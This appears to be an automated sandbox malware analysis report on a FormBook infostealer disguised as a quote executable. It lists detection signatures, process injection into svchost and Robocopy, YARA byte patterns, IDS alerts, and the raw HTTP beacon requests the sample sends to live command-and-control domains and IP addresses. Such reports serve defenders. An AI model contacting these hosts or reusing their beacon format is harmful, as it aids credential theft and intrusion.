Windows Analysis Report
Quote #270924.exe

Overview

General Information

Sample name: Quote #270924.exe
Analysis ID: 1520627
MD5: 1018070ffeb3f5fa59a306fa6e6b0f57
SHA1: df752f8bc6b8b9be639a4135c06f401a6701fc35
SHA256: 5da3520f7feeae6c6ec79f99c5cc9b5ff73bfd57b29ca80b3aa2fd1a718df59e
Tags: exe, user-TeamDreier

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Quote #270924.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\Quote #270924.exe" MD5: 1018070FFEB3F5FA59A306FA6E6B0F57)
    • svchost.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\Quote #270924.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • HoiWfznxKU.exe (PID: 5016 cmdline: "C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • Robocopy.exe (PID: 7488 cmdline: "C:\Windows\SysWOW64\Robocopy.exe" MD5: 0A1AA3D138103ED9FB645F6B02E41A2F)
          • HoiWfznxKU.exe (PID: 5008 cmdline: "C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7724 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c4d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x144cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c4d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x144cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ed73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16d72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2fb73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17b72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\Robocopy.exe", CommandLine: "C:\Windows\SysWOW64\Robocopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\Robocopy.exe, NewProcessName: C:\Windows\SysWOW64\Robocopy.exe, OriginalFileName: C:\Windows\SysWOW64\Robocopy.exe, ParentCommandLine: "C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe", ParentImage: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe, ParentProcessId: 5016, ParentProcessName: HoiWfznxKU.exe, ProcessCommandLine: "C:\Windows\SysWOW64\Robocopy.exe", ProcessId: 7488, ProcessName: Robocopy.exe
            Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Quote #270924.exe", CommandLine: "C:\Users\user\Desktop\Quote #270924.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote #270924.exe", ParentImage: C:\Users\user\Desktop\Quote #270924.exe, ParentProcessId: 7364, ParentProcessName: Quote #270924.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quote #270924.exe", ProcessId: 7460, ProcessName: svchost.exe
            Source: Process started, Author: vburov: Data: Command: "C:\Users\user\Desktop\Quote #270924.exe", CommandLine: "C:\Users\user\Desktop\Quote #270924.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote #270924.exe", ParentImage: C:\Users\user\Desktop\Quote #270924.exe, ParentProcessId: 7364, ParentProcessName: Quote #270924.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quote #270924.exe", ProcessId: 7460, ProcessName: svchost.exe

            AV Detection

            Source: Quote #270924.exe, Avira: detected
            Source: Quote #270924.exe, ReversingLabs: Detection: 36%
            Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Quote #270924.exe, Joe Sandbox ML: detected
            Source: Quote #270924.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: robocopy.pdb source: svchost.exe, 00000002.00000003.2241073869.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241073869.000000000083B000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985552449.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HoiWfznxKU.exe, 00000003.00000000.2197455182.000000000057E000.00000002.00000001.01000000.00000004.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344151814.000000000057E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.2175621784.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2177443732.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2277774868.000000000460F000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2275494698.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.2175621784.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2177443732.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, Robocopy.exe, 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2277774868.000000000460F000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2275494698.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: robocopy.pdbGCTL source: svchost.exe, 00000002.00000003.2241073869.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241073869.000000000083B000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985552449.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: Robocopy.exe, 00000004.00000002.3987313418.0000000004DEC000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002D35000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344639138.0000000002A0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2561116373.0000000006A0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: Robocopy.exe, 00000004.00000002.3987313418.0000000004DEC000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002D35000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344639138.0000000002A0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2561116373.0000000006A0C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\Robocopy.exe, Code function: 4_2_0081C8D0 FindFirstFileW,FindNextFileW,FindClose (4_2_0081C8D0)
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop edi (2_2_0041928D)
            Source: C:\Windows\SysWOW64\Robocopy.exe, Code function: 4x nop then xor eax, eax (4_2_00809C00)
            Source: C:\Windows\SysWOW64\Robocopy.exe, Code function: 4x nop then pop edi (4_2_00815BEA)
            Source: C:\Windows\SysWOW64\Robocopy.exe, Code function: 4x nop then mov ebx, 00000004h (4_2_046B04E8)
            Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then mov ebx, 00000004h (7_2_000002D1067BC4E8)

            Networking

            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63688 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63716 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:63716 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63705 -> 172.67.165.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63707 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63700 -> 38.47.233.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63728 -> 208.91.197.39:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63727 -> 160.251.148.20:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63704 -> 172.67.165.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63706 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63719 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63722 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63708 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63703 -> 172.67.165.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63694 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63731 -> 208.91.197.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63712 -> 162.0.238.43:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63723 -> 160.251.148.20:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63713 -> 162.0.238.43:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63709 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63699 -> 38.47.233.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63696 -> 38.47.233.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63726 -> 160.251.148.20:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63714 -> 162.0.238.43:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63730 -> 208.91.197.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63715 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63720 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63718 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63717 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63692 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63729 -> 208.91.197.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63693 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63702 -> 172.67.165.25:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63695 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63725 -> 160.251.148.20:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63701 -> 38.47.233.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63711 -> 162.0.238.43:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63721 -> 85.159.66.93:80
            Source: DNS query: www.030003302.xyz
            Source: Joe Sandbox View, IP Address: 162.0.238.43
            Source: Joe Sandbox View, IP Address: 65.21.196.90
            Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
            Source: Joe Sandbox View, ASN Name: CP-ASDE
            Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
            Source: Joe Sandbox View, ASN Name: INTERQGMOInternetIncJP
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /1nuz/?Ah=39evZXa6m7baCAiDcr0ch6V4fD09WsXkaMbScS7vY88jTdTJUv9E9AetrBPXqBlycVnLEijqhZPiEuH/pw4Oq8ZNp7wpFj1U/P2B+qNM5mXkMr/9uw3rZ9uOJdcOYzpfEQ==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.030003302.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /974s/?Ah=woBqQkVhEnZr0PORhZ6z2TjABxOeyQlLpumkFgr+omNv0XEbVjbEhcV/qAVpymWGpDThRtO2eu+z9gp0JATUVQjZP0Y2t77DZFNVy7Otm7ne66vNCWn1tABYRqLOiyRBkA==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.searchgpt.homesAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /mkti/?6RGD=r8eHwnMpb2dxK&Ah=jnThCjOJiNX3HI/1X6ra8iqRT8LvO5Bl0cjrkRPRR4aUtJ5UnZH8goi0lUnBvvC66wXnOPoFvnQ+LE8o+1Q4j9xZYpeOMfjH2lF0fJzOXlNgjT3mfY10J4nKlD3uClfrXg== HTTP/1.1Host: www.2q63f.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /f66t/?Ah=wMNxngytVvT+xiDvhZKVBLBZglmuZQUCx/WcIyOXqUp4vIwezETUsTI6SXRinkgbo4oPfyScfq3TTLYR3fLN41mF5bem5ZFkurSKCCFsELulDfuy7v5fTUVM4J27kpDPZg==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.b5x7vk.agencyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /7kkb/?6RGD=r8eHwnMpb2dxK&Ah=Vuf7L1aATO5bukV8eQdUIEmIaPgQ1yOpdgGCLe1WZLTuWrNT4xutTpWyFskV9eTAAXQRhMy7Zgc6S7zaREH9Qt7yJDZ+mejpqMKnoLgUtbmjvcVg7/Biou/HjIkaZAov/Q== HTTP/1.1Host: www.martaschrimpf.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /3nd4/?Ah=wX8jjEADFIUNbB1fuwn27lCA5Ee2RiJ4qVOVM3qHbtn5VxkeI5MaAkn7o3WZs+Yr7x4eULr6m9MYlnr0WXfs3GrmtSbeGOpl3yeERPUVozEPpEyzLyJ+XoeluijW2G1r0A==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.tomtox.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /e55r/?6RGD=r8eHwnMpb2dxK&Ah=Zzgqh8Lsa2kOmONOeD/+wB3QPxQKiLO67pxSC7hPMpOG1Z1VfhXWq1/e6lRyRcxlhH3VBh1kivLC4EoU4HrmQnEQVHiNTiKoH2rx3XIqvsrry8gzD7/bBD8mRjNwheBxYg== HTTP/1.1Host: www.tracy.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /zmf1/?Ah=wQgzSdKeo0kEfEOz4RbofRMggT2xbAKfRVneK/8vOxPjchK4g13SHjFeWQ1KQd6iPh0o+E7CiOJrL4NuVjgo/c0di4XWtbQHuM4tDDSwmQdaf4WdVMWT5U3p3+pOk6ad0A==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.sppsuperplast.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /bie8/?Ah=MA/0DFY0DiyH2olo7m8hVrrP5UH/jhcgcmWioqAK+793cplJM4qg3DyTQ66FMurZmF9Te+JpNl4zVYtM50IcS4zemXuWAdJhdKdflRI3BWRfqiAf3s5RU6wyOr9MBb+x+g==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.nojamaica.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /xf5b/?Ah=bUc8Ed0aZESOAy+KJaIejJlAhDqRJymtCfRMAnUAQR11I0sOX+AQaEFDTlraWU4+rT7gLfO5Dt9FKcAEmJO6tRh3wQ1OL/3vPyqK0hsKckbG/SsYmEPJIzY3hoX+M0Wr3w==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.alphaaistore.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: unknown
            HTTP traffic detected: POST /974s/ HTTP/1.1
            Host: www.searchgpt.homes
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Language: en-US,en;q=0.9
            Accept-Encoding: gzip, deflate, br
            Content-Length: 203
            Content-Type: application/x-www-form-urlencoded
            Cache-Control: max-age=0
            Connection: close
            Origin: http://www.searchgpt.homes
            Referer: http://www.searchgpt.homes/974s/
            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 796
            date: Fri, 27 Sep 2024 15:29:46 GMT
            vary: User-Agent
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 27 Sep 2024 15:30:32 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 27 Sep 2024 15:30:34 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
